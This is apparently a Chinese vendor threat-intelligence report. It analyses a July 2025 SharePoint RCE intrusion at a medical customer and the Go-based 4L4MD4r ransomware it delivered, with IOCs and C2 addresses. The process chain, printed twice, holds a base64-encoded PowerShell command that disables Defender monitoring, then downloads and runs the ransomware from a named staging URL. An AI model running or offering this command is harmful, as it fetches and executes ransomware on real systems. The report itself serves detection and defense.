奇安信威胁情报中心

返回 TI 主页

背景2025 年 7 月，Microsoft SharePoint 服务器曝出一个严重的远程代码执行（RCE）漏洞（CVE-2025-49704/CVE-2025-49706/CVE-2025-53770/CVE-2025-53771），该漏洞已被黑客组织广泛利用，影响全球数万台服务器，奇安信威胁情报中心红雨滴团队第一时间对该漏洞进行分析并在终端侧进行监控，在 7 月 27 日观察到某医疗客户部署在外网的 SharePoint 服务器被入侵，执行了恶意的 powershell 命令，但是被天擎拦截，后续分析获取到 golang 语言编写的 4L4MD4r 勒索软件，函数名带有浓厚的宗教色彩，根据友商的报告[1]，该武器似乎隶属于 mimo 攻击团伙，一个具有经济动机的土耳其威胁行为者。
我们建议政企客户在办公区和服务器区同时部署天擎，在开启天擎“六合”高级威胁防御引擎的情况下可以该漏洞进行拦截。

样本分析我们观察到的进程链如下：


-
-


父父进程


c:\windows\system32\inetsrv\w3wp.exe -ap "SharePoint - 80" -v "v4.0" ****


父进程


C:\Windows\System32\cmd.exe


目标进程


powershell.exe -exec bypass -enc UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARABpAHMAYQBiAGwAZQBSAGUAYQBsAHQAaQBtAGUATQBvAG4AaQB0AG8AcgBpAG4AZwAgACQAdAByAHUAZQA7AFsATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6AFMAZQByAHYAZQByAEMAZQByAHQAaQBmAGkAYwBhAHQAZQBWAGEAbABpAGQAYQB0AGkAbwBuAEMAYQBsAGwAYgBhAGMAawAgAD0AIAB7ACQAdAByAHUAZQB9ADsAIAAkAHcAYwAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAIAAkAHQAZQBtAHAAZgBpAGwAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABUAGUAbQBwAEYAaQBsAGUATgBhAG0AZQAoACkAOwAgACQAdABlAG0AcABmAGkAbABlACAAKwA9ACAAJwAuAGUAeABlACcAOwAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBpAGMAZQAuAHQAaABlAGkAbgBuAG8AdgBhAHQAaQBvAG4AZgBhAGMAdABvAHIAeQAuAGkAdAAvAHMAdABhAHQAaQBjAC8ANABsADQAbQBkADQAcgAuAGUAeABlACcALAAgACQAdABlAG0AcABmAGkAbABlACkAOwAgACYAIAAkAHQAZQBtAHAAZgBpAGwAZQA=


解码后的内容如下，主要功能为下载者
从意大利跳板网站上下载 payload 并执行，但被天擎拦截。


-
-


跳板URL


https://ice.theinnovationfactory.it/static/4l4md4r.exe


基于 VT 数据，我们获取了 4l4md4r.exe。
由 golang 语言编写的新型勒索软件，函数名带有非常浓烈的宗教色彩：
涉及伊斯兰教什叶派宗教语言：
4L4MD4r ransomware 似乎是 mino 组织首次投递，首先会在内存中解密最终载荷。
之后会申请内存来装载解密的 PE 文件。
最后新建线程执行。
解密加载的 PE 文件是 4l4md4r 勒索软件，首先会进行时间检测用于反调试，超时会终止运行。
之后会获取计算机名，并生成一个 ID 和 enckey(用于加密文件)，合并为一个 json。
将该 json 内容加密后通过 POST 方式上传到 http://bpp.theinnovationfactory.it:445。
如果发送失败超过三次，同样会终止运行。
上传成功后开始进行加密工作，通过 enckey 加密文件，被加密的文件名称会变为原来文件名的 base64 形式。
文件加密完毕后会在桌面生成勒索信 DECRYPTION_INSTRUCTIONS.html 和一个被加密文件的列表 NCRYPTED_LIST.html。
勒索信内容如下：
联系邮箱：m4_cruise@proton.me
加密后缀：.4l4md4r
用于加密 json 的公钥如下：
经过查询，攻击者提供的 BTC 钱包有 40 次转账记录，并没有出现金额为0.005BTC 的交易记录，这意味着截止到目前为止，没有受害者向 4l4md4r 勒索软件支付赎金。

总结目前，基于奇安信威胁情报中心的威胁情报数据的全线产品，包括奇安信威胁情报平台（TIP）、天擎、天眼高级威胁检测系统、奇安信NGSOC、奇安信态势感知等，都已经支持对此类攻击的精确检测。

IOCMD5：
90f71cb5df71ae3845ff81edd776b287
C2:
hxxps://ice.theinnovationfactory.it/static/4l4md4r.exe
bpp.theinnovationfactory.it:445

参考链接[1]. https://blog.sekoia.io/the-sharp-taste-of-mimolette-analyzing-mimos-latest-campaign-targeting-craft-cms/

-	-
父父进程
c:\windows\system32\inetsrv\w3wp.exe -ap "SharePoint - 80" -v "v4.0" ****
父进程
C:\Windows\System32\cmd.exe
目标进程
powershell.exe -exec bypass -enc UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARABpAHMAYQBiAGwAZQBSAGUAYQBsAHQAaQBtAGUATQBvAG4AaQB0AG8AcgBpAG4AZwAgACQAdAByAHUAZQA7AFsATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6AFMAZQByAHYAZQByAEMAZQByAHQAaQBmAGkAYwBhAHQAZQBWAGEAbABpAGQAYQB0AGkAbwBuAEMAYQBsAGwAYgBhAGMAawAgAD0AIAB7ACQAdAByAHUAZQB9ADsAIAAkAHcAYwAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAIAAkAHQAZQBtAHAAZgBpAGwAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABUAGUAbQBwAEYAaQBsAGUATgBhAG0AZQAoACkAOwAgACQAdABlAG0AcABmAGkAbABlACAAKwA9ACAAJwAuAGUAeABlACcAOwAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBpAGMAZQAuAHQAaABlAGkAbgBuAG8AdgBhAHQAaQBvAG4AZgBhAGMAdABvAHIAeQAuAGkAdAAvAHMAdABhAHQAaQBjAC8ANABsADQAbQBkADQAcgAuAGUAeABlACcALAAgACQAdABlAG0AcABmAGkAbABlACkAOwAgACYAIAAkAHQAZQBtAHAAZgBpAGwAZQA=

-	-
跳板URL
https://ice.theinnovationfactory.it/static/4l4md4r.exe

勒索漏洞利用 SHAREPOINT MICROSOFT